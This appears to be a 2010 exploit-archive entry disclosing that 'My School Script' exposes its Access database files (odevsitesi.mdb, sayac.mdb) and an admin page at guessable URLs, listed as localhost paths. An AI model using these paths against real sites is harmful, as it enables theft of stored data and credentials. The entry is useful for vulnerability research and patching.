id: 11773
date: 04/13/2010
title: My School Script Data Base Download Vulnerability
author: indoushka
cves: 

=================================================
My School Script Data Base Download Vulnerability
=================================================

========================================================================================                 
| # Title    : My School Script Data Base Download Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.iqs3cur1ty.com
 
| # Bug      : DB                                                          
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 
     1 - http://127.0.0.1/My.School/odevsitesi.mdb
      
     2 - http://127.0.0.1/My.School/sayac.mdb
      
     3 - http://127.0.0.1/My.School/admin.asp 



#  0day.today [2023-03-25]  #